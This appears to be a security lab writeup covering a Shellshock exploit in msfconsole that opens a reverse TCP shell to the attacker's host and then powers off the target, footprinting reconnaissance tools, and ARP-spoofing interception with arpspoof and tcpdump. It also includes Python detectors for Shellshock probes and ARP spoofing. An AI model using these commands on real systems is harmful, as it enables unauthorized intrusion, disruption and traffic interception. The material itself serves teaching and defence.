Metasploit using msfconsole

Objective:

Shut down the target machine using Metasploit

Steps:

  1. run msfconsole in a Kali terminal by typing
    msfconsole
  2. check whether the target machine is vulnerable by using the auxiliary scanner module in msfconsole; type
    use auxiliary/scanner/http/apache_mod_cgi_bash_env

    and type

    show options

    to show the options and see which fields are required

  3. among the requirements, RHOSTS and TARGETURI need to be filled: RHOSTS with the target IP address, and TARGETURI with /cgi-bin/status, the path the command runs on. Type
    set RHOSTS target.ip.address

    to set the RHOSTS, and

    set TARGETURI /cgi-bin/status

    to set the TARGETURI to /cgi-bin/status

  4. now type
    id

    and

    run

    to see whether the target is vulnerable. If it is, the module returns information about the target.

  5. Now that the target is known to be vulnerable, use the bash exploit module in msfconsole by typing
    use exploit/multi/http/apache_mod_cgi_bash_env_exec

    and type

    show options

    to show the options and see which fields are required

  6. repeat step 3, filling RHOSTS with the target IP address and TARGETURI with /cgi-bin/status.
  7. set the payload that will be sent to a Linux reverse TCP shell; to do so, type
    set payload linux/x86/shell/reverse_tcp
  8. when you type
    show options

    it will show the payload options and the fields that need to be filled. LHOST and LPORT need to be filled with your machine's IP address, from which the packet will be sent, and your machine's port, 443, the SSL port. To do so, type

    set LHOST your.ip.address

    and

    set LPORT 443
  9. to run and send the payload to the target machine, type
    run

    if the connection is successful, it will open a session between your local machine and its port, for example 192.168.15.4:443, and the target machine and its port, for example 192.168.15.6:35754

    you can check the connection by typing

    ifconfig

    to check whether the IP matches the one shown by msfconsole

  10. to shut down the target machine, type
    sudo -s

    to gain root privileges, then, to shut down the machine, type

    poweroff
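As an added, defender-side example that is not part of the original writeup: a small Python scanner over constructed Apache combined-format access log lines that flags the bash function-definition prefix the apache_mod_cgi_bash_env modules above send (the Shellshock pattern), including URL-encoded variants in the request line. The log lines, IPs and timestamps are constructed, and cgi_hosts_probed is a helper invented here.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format access log lines (not real traffic).
# Line 1 carries the probe in the User-Agent, line 4 carries it URL-encoded in the query string.
SAMPLE_LOG = """\
192.168.15.4 - - [10/Oct/2023:10:00:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :; }; echo vulnerable"
192.168.15.4 - - [10/Oct/2023:10:00:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.15.9 - - [10/Oct/2023:10:00:03 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "curl/7.88.1"
192.168.15.4 - - [10/Oct/2023:10:00:04 +0000] "GET /cgi-bin/status?x=%28%29%20%7B%20%3A%3B%20%7D%3B%20echo%20x HTTP/1.1" 500 0 "-" "curl/7.88.1"
"""

# The exported-function prefix "() { ... };" that vulnerable bash parses out of any
# environment variable; mod_cgi copies request headers into the CGI environment.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# Combined log format: client ident user [timestamp] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)


def find_shellshock_attempts(log_text):
    """Return one (line_no, client_ip, field, decoded_value) tuple per suspicious field."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; a real deployment would count the parse miss
        # The prefix may arrive percent-encoded, so match on the decoded value.
        for field in ("req", "ref", "ua"):
            value = unquote(m.group(field))
            if SHELLSHOCK_RE.search(value):
                hits.append((line_no, m.group("ip"), field, value))
    return hits


def cgi_hosts_probed(hits, log_text):
    """Client IPs that sent the pattern against a /cgi-bin/ path (the TARGETURI above)."""
    lines = log_text.splitlines()
    return sorted({ip for line_no, ip, _, _ in hits if "/cgi-bin/" in lines[line_no - 1]})


if __name__ == "__main__":
    for hit in find_shellshock_attempts(SAMPLE_LOG):
        print("line %d from %s: field %s contains %r" % hit)
```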

Footprinting

What is Footprinting?

Footprinting is used to gain information about the target system. It is done before launching an attack. To do footprinting, we can use tools such as DNS queries, whois, Nmap, etc.

What information can we get from doing this?

By doing footprinting, we can gather information about the target such as:

  • Network information, such as IP addresses, domains, DNS records
  • System information, such as the OS the website runs on
  • Organizational information, such as the physical address of the owner

Tools:

What tools can be used for footprinting?

  • Whois
  • Sam Spade
  • Nmap
  • nslookup
  • Maltego

as cited from https://hackernoon.com/https-medium-com-aamralkar-footprinting-and-reconnaissance-e14010b22a89, there are a lot of different footprinting methods:

  1. Footprinting through Social Media: this one is the easiest to do; mostly attackers will create fake accounts/ids and try to gather as much information as possible about the target organization.
  2. Footprinting through Search Engines like Bing, Google and DuckDuckGo. My favorite is DuckDuckGo. Attackers also look for caches and archives. Some of the good tools to perform footprinting are Netcraft, Shodan, Pipl and Google Earth.
  3. Footprinting through job sites. Hackers will come to know what tools and technology the organization is working on.
  4. Target monitoring through alerts like Google Alerts, Twitter alerts, Yahoo alerts.
  5. Another good method is via Google Hacking databases and advanced search queries. Query strings can be used in search and can be used as keywords. Google Advanced Search Operators can also be utilized. For example “intitle index of” lists all the sites with an open index. securityfocus.com and hackersforcharity.org/ghdb are a few sites where you can get most of the info.
  6. Website footprinting is monitoring the target organization's website. Web server details, directory structure and developers' email ids are some of the common info. There are also tools available to mirror the whole website. Older versions of the website can be extracted from archive.org.
  7. Email tracking is used to track emails. Emails are used to gather information in order to perform social engineering, spam and many other attacks.
  8. DNS Information: attackers can get the hosts in the network. Hackers can get A, CNAME, PTR, MX, NS and HINFO records. There are a lot of command line utilities available to get DNS information; nslookup and dig are the most common among them.
  9. WHOIS: attackers perform WHOIS lookups to understand who is behind a specific domain. ARIN, AFRINIC, RIPE, APNIC and LACNIC are the RIRs (Regional Internet Registries). From WHOIS we can get info like email, domain owner, address, name servers for the domain and registrar.
  10. Network Footprinting
  11. Footprinting through Social Engineering: eavesdropping, shoulder surfing, dumpster diving.

Techniques & Steps for doing footprinting

  1. Ping Sweeps

    You can ping a host to find its IP address; for example, to check Google's IP address, run

    ping google.com
  2. The Harvester

    theHarvester is a tool in Kali Linux for gathering e-mail addresses, account names and subdomain names from public sources such as Google, Baidu, Bing, etc.

    These are the options for using theHarvester:

    • -d: Domain to search or company name
    • -b: data source: baidu, bing, bingapi, dogpile, google, googleCSE, googleplus, google-profiles, linkedin, pgp, twitter, vhost, virustotal, threatcrowd, crtsh, netcraft, yahoo, all
    • -s: start in result number X (default: 0)
    • -v: verify host name via dns resolution and search for virtual hosts
    • -f: save the results into an HTML and XML file (both)
    • -n: perform a DNS reverse query on all ranges discovered
    • -c: perform a DNS brute force for the domain name
    • -t: perform a DNS TLD expansion discovery
    • -e: use this DNS server
    • -p: port scan the detected hosts and check for Takeovers (80,443,22,21,8080)
    • -l: limit the number of results to work with (bing goes from 50 to 50 results, google 100 to 100, and pgp doesn’t use this option)
    • -h: use SHODAN database to query discovered hosts

    example usage

    theharvester -d binus.ac.id -l 500 -b google
  3. Whois

    whois is used to get data about the domain you’re looking up, such as the registrar, the IP, etc.

    usage of whois

    whois google.com
  4. Google Dorks

    Google can also be used to gather sensitive information. Google Dorks are simply ways to query Google for certain information that may be useful for your security investigation.
    Some popular operators used to perform Google Dorking:

    • Filetype: use this dork to find files of any given type.
    • Ext: helps you find files with specific extensions (e.g. .txt, .log, etc.).
    • Intext: searches for specific text inside any page.
    • Intitle: searches for specific words inside the page title.
    • Inurl: looks for the given words inside the URL of any website.

    example of google dorks

    filetype:pdf site:"*.com"

Eavesdropping

Objective:

To see transferred packets throughout the network


Steps:

  1. open a command line and type
    echo 1 > /proc/sys/net/ipv4/ip_forward

    next, find out your IP using

    ifconfig

    after you have found your IP, find the target IP and run

    arpspoof -t your.ip.address target.ip.address

    in this case, my IP is 172.20.10.1 and the target IP is 172.20.10.12

  2. run the first step in a new tab with your IP and the target IP swapped, such as
    echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -t target.ip.address your.ip.address

  3. in a new tab, run the command to eavesdrop on the target's packets
    tcpdump -vv src 172.20.10.12 -w foldername/fileoutputname.pcap

    it will keep listening to the network for a while; to stop, press Ctrl+C on your keyboard

  4. the output will be written to the foldername/fileoutputname.pcap you specified; you can open the file in Wireshark to see what happened while you were listening to the network
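An added, defender-side example that is not part of the original writeup: a Python checker over constructed tcpdump-style ARP reply lines that flags the symptoms of the ARP spoofing described above: a documented gateway IP answered by a different MAC, one MAC answering for two IPs, and an IP flipping between MACs. The timestamps, all MAC addresses and the KNOWN_MACS table are constructed assumptions; only the two IPs come from the steps above.

```python
import re
from collections import defaultdict

# Constructed ARP lines in tcpdump's text style (not a real capture). 172.20.10.1 is the
# gateway from the steps above, 172.20.10.12 the target; every MAC is made up:
# ...:0a is the real gateway, ...:01 the real target, ...:ee a host answering for both.
SAMPLE_ARP = """\
12:00:01.000001 ARP, Request who-has 172.20.10.1 tell 172.20.10.12, length 28
12:00:01.000200 ARP, Reply 172.20.10.1 is-at 02:00:00:00:00:0a, length 28
12:00:03.000000 ARP, Reply 172.20.10.1 is-at 02:00:00:00:00:ee, length 28
12:00:03.000100 ARP, Reply 172.20.10.12 is-at 02:00:00:00:00:ee, length 28
12:00:05.000000 ARP, Reply 172.20.10.1 is-at 02:00:00:00:00:0a, length 28
12:00:06.000000 ARP, Reply 172.20.10.12 is-at 02:00:00:00:00:01, length 28
"""

# Documented gateway MAC (constructed); in practice taken from the router or an inventory record.
KNOWN_MACS = {"172.20.10.1": "02:00:00:00:00:0a"}

REPLY_RE = re.compile(
    r"^(?P<ts>\S+) ARP, Reply (?P<ip>\S+) is-at (?P<mac>(?:[0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}),"
)


def parse_arp_replies(text):
    """Return (timestamp, ip, mac) for each ARP reply line; requests are ignored."""
    replies = []
    for line in text.splitlines():
        m = REPLY_RE.match(line)
        if m:
            replies.append((m.group("ts"), m.group("ip"), m.group("mac").lower()))
    return replies


def detect_arp_spoof(replies, known_macs):
    """Return (timestamp, ip, mac, reason) alerts for replies that look like cache poisoning."""
    alerts = []
    last_mac_for_ip = {}
    ips_per_mac = defaultdict(set)
    for ts, ip, mac in replies:
        ips_per_mac[mac].add(ip)
        expected = known_macs.get(ip)
        if expected is not None:
            if mac != expected:  # a documented address claimed by someone else
                alerts.append((ts, ip, mac, "conflicts with documented MAC %s" % expected))
        elif ip in last_mac_for_ip and last_mac_for_ip[ip] != mac:
            alerts.append((ts, ip, mac, "IP moved from %s" % last_mac_for_ip[ip]))
        # arpspoof run in both directions (steps 1 and 2 above) makes one MAC answer for two IPs
        if len(ips_per_mac[mac]) > 1:
            alerts.append((ts, ip, mac, "one MAC answers for %s" % sorted(ips_per_mac[mac])))
        last_mac_for_ip[ip] = mac
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoof(parse_arp_replies(SAMPLE_ARP), KNOWN_MACS):
        print("%s %s is-at %s: %s" % alert)
```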